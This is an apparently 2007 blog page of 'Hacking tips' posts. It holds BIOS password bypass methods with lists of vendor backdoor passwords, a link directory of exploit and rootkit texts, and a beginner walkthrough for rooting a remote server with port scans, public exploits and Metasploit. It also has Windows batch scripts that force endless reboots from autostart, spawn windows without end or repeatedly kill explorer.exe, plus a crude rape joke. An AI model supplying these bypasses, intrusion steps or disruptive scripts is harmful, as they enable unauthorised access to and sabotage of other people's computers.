The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21 RCL (RAM Clear)
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13
NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.
Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
5v
24 20 13
|___________|____________________|
| |
| DALLAS |
|> |
| DS12885S |
| |
|__________________________________|
| |
1 12
gnd
Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
__________
1 -| * U |- 24 5v
2 -| |- 23
3 -| |- 22
4 -| |- 21
5 -| |- 20
6 -| |- 19
7 -| |- 18
8 -| |- 17
9 -| |- 16
10 -| |- 15
11 -| |- 14
gnd 12 -|__________|- 13
Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.
Important
Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .
Key Disk for Toshiba laptops
Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.
Key protected cases
A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.
That's all.
Clear Cmos, jumper.That is the way how I solve problem when customer forgets password.
More
There are a few different ways to reset the cmos, here's a few:
1. there are many default common passwords,
such as:
At boot-up note the BIOS provider (Award, AMI, Phoenix, IBM, etc.)
For Award BIOS' try these backdoor passwords:
AWARD_SW
j262
HLT
SER
SKY_FOX
BIOSTAR
ALFAROME
Lkwpeter
j256
AWARD?SW
LKWPETER
syxz
ALLy
589589
589721
awkward
CONCAT
d8on
CONDO
j64
szyx
For AMI BIOS' try these backdoor passwords:
AMI
BIOS
PASSWORD
HEWITT RAND
AMI?SW
AMI_SW
LKWPETER
A.M.I.
CONDO
For PHOENIX BIOS' try this backdoor password:
phoenix
there are too many to count here's a list
http://www.phenoelit.de/dpl/dpl.html
(search for PC BIOS)
2. On some older PC's pressing the insert key upon startup will clear
the CMOS, make sure you hold it down till it's done booting.
3. Another way which we pretty much already covered, was to pull the
metallic nickel looking battery that supplies power to the CMOS.
4. Some times there is a small three pin jumper used to reset the bios,
just move the black little pin cover to the opposite two pins.
(Make sure to read the motherboards manual before this)
5. If the battery is soldered in you can take a soldering iron to it but
I don't recommend it unless you are a professional.
6. there are a few programs out on the net which are made to crack
certain types of bios passwords, I have one for award BIOS's here's a
couple:
http://www.11a.nu/ibios.htm
http://natan.zejn.si/rempass.html
Good reading:
http://www.astalavista.com/library/...ios_hacking.txt
http://www.virtualplastic.net/html/misc_bios.html
Tools:
http://www.red-demon.com/pwrecovery.htm
0 0 0 0
Posted by Venkatesh Vedhakumar at Tuesday, June 12, 2007 0 comments Links to this post
Labels: Hacking tips
Tuesday, June 5, 2007
Hacking
ETHICS & HUMOR
Name Description Size
Hackers Manifest The hackers manifest by the Mentor. Every hacker should know this 1,755 bytes
Diary of a hacker Duh... 13,226 bytes
Hacker Ethics What is A hacker ? 2,777 bytes
Are you a hacker ? See if you fit this description... 784 bytes
How I knew when I was a hacker Another file on being a hacker 2,585 bytes
A Guide to Internet Security: Becoming an Uebercracker and Becoming an UeberAdmin to stop Uebercrackers A joke, not to be taken seriously (unless you want to go to jail, of course...) 4,035 bytes
Concerning Hackers Who Break into Computer Systems File on hackers by a sysop who's sympathetic to hackers 22,914 bytes
Zero Tolerance Book on bad ass mother fuckers in the old days 181,467 bytes
The Hacker Crackdown Good book that describes the hacker crackdown of 1991 275,654 bytes
Ethics Of A True Hacker Recent file written by The Mob Boss about hacking ethics. Nice 2,952 bytes
The Mob Boss's Guide To Hacking Guide for beginner hackers on how to start by The Mob Boss. Read this if you're just starting 12,224 bytes
Psychological Profile Of The Troubled Female Teen Funny file on how to hack girls. Read it for a laugh 5,143 bytes
How To Be A Hacker File that explains the hacker mentality. Nice one 11,834 bytes
Humor Teaches you how to be 31337 15,613 bytes
UNIX
Name Description Size
Hackers Kit Explains UNIX security all round and shows a few basic old bugs. Also has a root kit. This was the file that taught me the basics of hacking UNIX 295,129 bytes
Unix Computer Security Checklist Security holes to look out for when hacking a system 26,429 bytes
Improving the Security of Your Site by Breaking Into it Nice (old) paper on common holes 20,827 bytes
Unix : A Hacking Tutorial Well written file on the basics of unix 37,944 bytes
Millenium Hacking A file written to show people what hacking was like at the end of the 20th century. Basic, but good for beginners 368,329 bytes
Unix for Intermediate Users Not so much a hacking file, just explains the basics of unix. 71,758 bytes
Crash Course In X Windows Security Explains the basics of X Windows security 5,449 bytes
Playing with the Internet Daemons Old file explaining bugs in daemons, good for beginner hackers to get an idea about what security holes are 6,467 bytes
Secure UNIX programming FAQ Explains the basics on how to code safely in UNIX 21,211 bytes
NFS Tracing By Passive Network Monitoring Good read if you're interested in NFS 12,368 bytes
Linux Administrators Security Guide THE linux security resource (PDF) 273,688 bytes
Securing and Optimising Red Hat Linux I cannot praise this enough. 475 pages of how to secure your redhat box properly. READ IT!!! (PDF) 2,468,188 bytes
Kernel hacking made easy Short tutorial that provides a nice introduction to kernel system calls 3,796 bytes
Coding with the DNS protocol Short tutorial on coding with DNS 8,740 bytes
Linux Firewalling - Insights and Explainations... Read this and learn a bit about firewalls 5,358 bytes
A Lab engineers check list for writing secure Unix code Paper that explains a few things you can do to code more secure programs in Unix 8,106 bytes
SOCKETS
Name Description Size
BSD Sockets: A Quick And Dirty Primer This is a short tutorial that explains what sockets are, how they work, and gives sample code showing how to use them. 486,960 bytes
A brief programming tutorial in C for raw sockets Teaches the basics of using raw sockets in C, to insert any IP protocol based datagram into the network traffic. 7,309 bytes
CRACKING
Name Description Size
How To Crack Good file that teaches the basics of cracking 122,376 bytes
The Ancient Art Of Cracking Another excellent file on cracking 68,917 bytes
BUFFER OVERFLOWS
Name Description Size
How to write buffer overflows File that explains how to write buffer overflows 7,195 bytes
Smashing The Stack For Fun And Profit Excellent file that explains buffer overflows 15,191 bytes
Exploiting Windows NT 4 Buffer Overruns By far the best file I've found that explains buffer overflows in NT 12,629 bytes
Writing buffer overflow exploits - a tutorial for beginners Short and sweet tutorial 8,916 bytes
Libsafe : Protecting Critical Elements of Stacks Nice whitepaper that explains buffer overflows and what libsafe does (PDF) 177,423 bytes
Buffer Overrun Attacks Explains what buffer overflows are. Good for beginners (PDF) 387,028 bytes
Advanced buffer overflow exploit Shows all the cool sutff you can do once you've found a buffer overflow 9,169 bytes
Compromised - Buffer Overflows, from Intel to SPARC Version 8 Talks about what buffer overflows are, why they work and how to approach them. Again, a good file for beginners 19,141 bytes
w00w00 on Heap Overflows Nice and sweet tutorial on heap-based buffer overflows 13,408 bytes
NOVELL NETWARE
Name Description Size
The unofficial netware Hack FAQ Everything you wanted to know about netware 41,634 bytes
DENIAL OF SERVICE
Name Description Size
Introduction to denial of service Intro on denial of service attacks 17,459 bytes
Protecting Routing Infrastructures from Denial Of Service Using Cooperative Intrusion Detection Whitepaper that explains a method to combat DoS attacks. Interesting read (PDF) 118,400 bytes
CGI
Name Description Size
Safe CGI Programming Nice little paper that explains the basics for writing safe CGI code 6,456 bytes
CODING
Name Description Size
C Programming Nice and sweet C tutorial 200,316 bytes
MISCELLANEOUS
Name Description Size
Modern Hackers Deskreference Reference file with things that every hacker should know. Contians info on WindowsNT security issues, Unix, Linux, Irix, Vax, Router configuration, Frontpage, Wingate and much much more. READ IT 182,301 bytes
Common Insecurities Fail Scrutiny Explains Netbios & Samba bugs and how to exploit them 46,313 bytes
Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks Explains the basics on how to hack a system from a system administrators point of view (VERY basic) 12,027 bytes
The unofficial Web Hack FAQ Nice things to do with the web 54,000 bytes
Simple Active Attack Against TCP This paper describes an active attack against the Transport Control Protocol (TCP) which allows a cracker to redirect the TCP stream through his machine thereby permitting him to bypass the protection offered by such a system as a one-time password [skey] or ticketing authentication [kerberos] 14,302 bytes
Introduction to the Internet Protocols This is an introduction to the Internet networking protocols (TCP/IP). It includes a summary of the facilities available and brief descriptions of the major protocols in the family 30,737 bytes
The Hackers Handbook May be old, by an excellent read nontheless. Read it to understand the basics and a bit of hacker history 127,015 bytes
PORTSCANNING
Name Description Size
Practical Automated Detection Of Stealthy Portscans (PDF) Explains how to detect portscans. Although meant for people trying to protect their systems it explains some of the techniques portscanners use to remain undetected. 151,603 bytes
ICMP Usage In Scanning (PDF) Paper that describes what information can be gained from a target network using ICMP. Well written and DEFINATELY worth a read if you're a beginner. 434,372 bytes
WINDOWS NT
Name Description Size
The unofficial NT Hack FAQ Basics on NT security 44,622 bytes
Wardoc This document is an attempt by the Rhino9 team to document the methodology and techniques used in an attack on A NT based network. The intent of this document is to educate administrators and security professionals of both the mindset of an attacker and A large set of the current NT penetration techniques. This document attempts to follow in the footsteps of the classic text, "How To Improve The Security Of Your Site by Breaking Into It" by Dan Farmer and Wietse Venema. Obviously, this text will not contain all known methods for NT network penetration 28,388 bytes
Understanding Microsoft Proxy Server 2.0 This documented was not made for people who have been working with Microsoft Proxy Server since its beta (catapult) days. It is made for individuals who are curious about the product and security professionals that are curious as to what Microsoft Proxy Server has to offer. This document is also being written for individuals have a general idea of what a Proxy Server does, but wants to know more. This paper goes into discussion of Proxy Server Features and Architecture, Access Control, Encryption, and Firewall Strategies (which I have been getting a lot of requests for) 10,971 bytes
Analysis of the Security of Windows NT Interesting paper about Windows NT security (PDF) 417,510 bytes
A *REAL* NT Rootkit, patching the NT Kernel Nice tutorial that explains how to patch NT to do what you want it to do 17,304 bytes
VAX
Name Description Size
Vax Hacking FAQ The only file that I could find that deals singularly with VAXEN. So it'll have to do. Never used A VAX before, so I can't vouch for this file 21,823 bytes
A Practical Exercise in Securing an OpenVMS System This paper deals with securing VMS. As I've never uses OpenVMS I can't vouch for this one either 32,650 bytes
RAINBOW BOOKS
Colour Description Size
Aqua Glossary of Computer Security Acronyms 21,415 bytes
Blue Trusted Product Evaluation Questionnaire 18,197 bytes
Brown Guide to Understanding Trusted Facility Management 29,060 bytes
Burgendy A Guide To Understanding Design Documentation 20,543 bytes
Dark Lavender A Guide To Understanding Trusted Distribution in Trusted Systems 17,502 bytes
Green DoD Password Management Guideline 18,690 bytes
Grey TRUSIX Rationale for Selecting Access Control List Features For The Unix System 38,835 bytes
LightBlue A Guide To Understanding I & A 18,101 bytes
Orange DoD Trusted Computer System Evaluation Criteria 63,911 bytes
Another Orange A Guide To Understanding Configuration Management in Trusted Systems 42,462 bytes
Peach A Guide To Writing the Security Features User's Guide for Trusted Systems 16,576 bytes
Pink Rating Maintenance Phase Program 26,257 bytes
Purple Guidelines for Formal Verification Systems 17,667 bytes
Red Trusted Network Interpretation 246,679 bytes
Another Red Trusted Network Interpretation Environments Guideline 37,272 bytes
Venice Blue Computer Security Subsystems 18,251 bytes
Yellow Guide For Applying the DoD Trusted Computer System Evaluation Criteria In Specific Enviroments
Contents of this post are taken from http://www.xs4all.nl/~l0rd/hack.htm
21,420 bytes
0 0 0 1
Posted by Venkatesh Vedhakumar at Tuesday, June 05, 2007 0 comments Links to this post
Labels: Hacking tips
Rooting
An article on gaining root to a remote system:
Too often have I seen articles that claim to teach how to hack into a server, but all they do is just show you how to scan open ports, and many many people have no idea what to do with an open port. So I am going to show you pretty much all the basics, to get you well on your way to your first ever successful hack of a server, giving you root privileges.
First tool that you will need is a good port scanner. Nmap and SuperScan are my favourites by far, and Nmap is by far the most popular port scanner in the world because of its many features. You can download both at: http://www.hackinglibrary.ws/dl/downloads/superscan4.zip and http://insecure.org/nmap/
SuperScan: If you have a website that you mainly want to target, then just copy and paste the URL into the box and click lookup. It will automatically determine the IP address, and with this you can simply scan away.
Nmap: Nmap is all used through CLI (Command Line Interface). Now to determine the IP address of a website, just run a WHOIS on it, http://whois.domaintools.com is the best one I know of and has many features, also check out http://www.dnsstuff.com/ which is also very useful and has many features. So now if you just simply typed "nmap 192.168.1.1" (changing the IP you see here to the target's IP address) it will scan the target for open ports and using -O will fingerprint the OS the remote system is using.
Once you have your port list at hand, now you will need to find out what programs each port are running, and the best manual way to do this is to connect to each port through telnet. When you are connected, you will be welcomed by a screen with some information, if you now copy and paste all this information into a .txt file, and do this for each port, it will become clear which programs run on which ports, and also the you will be able to see if it has the latest versions of the software (remember that new versions come out, securing the program more, so if the program has an extremely old version of the software, it will more likely be exploitable).
Once you have done this and got a list of all the programs running on the open ports, now is the time to search for an exploit. There are many ways to do this:
Milw0rm is an old favourite of mine http://www.milw0rm.com if you go to http://www.milw0rm.com/port.php it will give you a drop down menu of ports, just look through each one, and check if the exploits for the programs there match any of the programs you have in your .txt file, and finally check the versions. If you see an exploit there, then click on it, if it's a Perl exploit (will start with #!/usr/bin/perl) this is even better because it means that you don't have to mess about compiling the exploit. If not, then you will have to compile the exploit yourself, look up on another article for this, but you will need cygwin if you are running Windows. All you have to do is run this command "pl exploit.pl [target]" and if you're lucky it will be successful and all you need do now is either connect through netcat (the hacker's best friend, an alternative to telnet) and you will have root priviladges. Or if the payload is a reverse bind, then your computer may open another terminal automatically with root rights. Now you may go to the directory that the site is stored in (usually /home/site here) and you can do whatever you feel to the site in question.
Metasploit is another great method. You can download metasploit from: http://framework.metasploit.com/msf/download
Now once you have this, run it (msfconsole) and type "show exploits" this will give you a list of all the exploits in metasploit's library. Look for one that exploits one of the port's programs you found, and when you find it, type "use [exploit here]"
Now, "show targets" this will give you a list of targets, just set it to the OS you found while fingerprinting it with Nmap, type "set target x"
now, "show payloads" will show you the payloads available, using a reverse bind will give you the prompt, others you will have to connect yourself through netcat. Also, note that it has FreeBSD, win32, and Linux payloads, depending on the system. Right, now type "show options" and it will give you a list of options, which will show you the various parameters for the specific exploit you're working with. Set RHOST to the IP of your target by "set RHOST 192.168.1.1" and set LPORT as the listening port you want, port 4444 is the default. If you want to reset it all, just type "back" into your console.
If all is well, then all you need to type is "exploit" and metasploit will do it all for you, and once again you have just owned another system.
The final method is writing the exploit yourself. This is a more advanced level, and there are many places that teach you the basics, phrack.org has some good tutorials. But there is no tutorial that will teach you how to write your own exploits all the time, because after all, programming is about learning yourself through experience and practice.
If you have any further questions, then please please use google, google really is a hacker's best friend, and it has all the answers to life's problems ;-) If all else fails, then please feel free to mail me at paranoiahax@live.com.
This article was intended for the newbies out there who are still unsure about what the elite call "real hacking" and I apologise if it isn't very well structured, as I am not too good at writing articles.
Once final note is that using these methods illegally and improperly will probably land you a one way ticket to jail, you will not pass go, will not collect £200 and will get raped by a big white man called Bubba. Use the skills taught here for ethical reasons only, and HackThisSite nor myself are responsible for any actions that you do, or any damage that you cause. You have been warned.
0 0 0 0
Posted by Venkatesh Vedhakumar at Tuesday, June 05, 2007 0 comments Links to this post
Labels: Hacking tips
CMD, the basics and a few scripts
First of all, I realize there are other articles about this kind of stuff
But I bring up some other stuff that they didn't.
--------------------------------------------------------------------
CMD
CMD is short for commander.
It is great for a lot of things and it's also very clean.
-----------------------------------------------------------------------------------------------
Lets learn how to make the computer shut down everytime it's booted, shall we?
-----------------------------------------------------------------------------------------------
First open CMD,
Next open notepad.
If you write "start shutdown -r" in CMD and press enter, your computer will restart. Also if you write the same in "run".
(Change -r to -s to shutdown computer, or write -l to logg off.)
If you write
---------------------------------------
@echo off
cls
start shutdown -r
cls
goto :a
---------------------------------------
in notepad and save it as something.bat (bat is important) and then open it, your computer will restart in the same way.
So, lets get into autostart. Put that bat file in autostart (autostart can be found in start menu) and each time your
computer is booted it will start that file and your computer will restart.
If you write the next script your computer will try to shutdown several times at once. it will freak for about half a minute
and then turn off.
Lets get a better understanding how scripts works. The above script shuts down your computer, but a bat file normaly opens
CMD and does whatever you told it to do.
@echo off - This is where you put commands that shouldn't be shown as text. For example cls. You don't want that to be text,
it's a command.
cls - This one is pretty good, it clears the text in the CMD screen
CMD - This command gives you a new CMD session.
start - this triggers stuff, in this case it's shutdown.
color - changes the colour in the cmd window, I recommend writing "color 0a", which is a green color thats really cool
on a black window.
title - write "title something" to change title.
goto :a - This one is really, really, really, really cool. It's used for making loops and some more advanced stuff that I
wont go into. Lets say you write
--------------------------------------
@echo off
:a
cls
start shutdown -r
cls
goto :a
--------------------------------------
The goto :a tells you to go to :a higher up in the script. so it starts the script again, then it does the goto :a command
again and the script reloads. Basicaly a loop. You can change the "a" to whatever you want, for example "error". This is
only to make it easier for you to read your script.
The : infront of "a" must stay where it is.
Bad example:
goto: a
Good example:
goto :a
--------------------------------------
dir - This shows you the files in the directory you are in.
dir /s - This shows you all the files on your computer.
echo - write "echo something" and it will be as a text in cmd.
echo. This is a linebrake.
cd - Write cd followed up with a location, to go there in cmd. For example "cd c:\windows".
cd .. - This goes back one step in the directory. For example if your in c:\windows and write "cd .." you go back to c:\.
So now you know the basics, which we'll use to make you computer do stuff. In cmd you can write "help" to get a list of most
commands.
Moving away from learning commands now.
-----------------------------------------------------------------------------------------------
Lets make a spamm script.
-----------------------------------------------------------------------------------------------
-----------------------------------------------
@echo off
cls
:a
start notepad.exe
goto :a
-----------------------------------------------
this script will continue to open notepad until you close cmd. Not recommended to run this on a slow computer.
As we said before, "start" triggers things, this script triggers notepad and then the loop (goto :a) is triggered.
-----------------------------------------------------------------------------------------------
Lets just mess around.
-----------------------------------------------------------------------------------------------
-----------------------------------------------
@echo off
cls
:a
taskkill /im explorer.exe /f
goto :a
-----------------------------------------------
This will close the bar where start menu and tasks are shown, for example if you open internet you will see it at the bottom
of the screen on the explorer bar.
Closing this will leave people with little things to do.
Hope you liked the article. If you think I missed something please contact me.
1 0 0 0
Posted by Venkatesh Vedhakumar at Tuesday, June 05, 2007 0 comments Links to this post
Labels: Hacking tips
Newer Posts Older Posts Home
Subscribe to: Posts (Atom)
Tuesday, March 24, 2009
Subscribe to:
Post Comments (Atom)
Video Bar
amaze u with this
feel it
some good advice for u
tell your feeling after seeing this
wanna like this
amazing
.jpg)
0 comments:
Post a Comment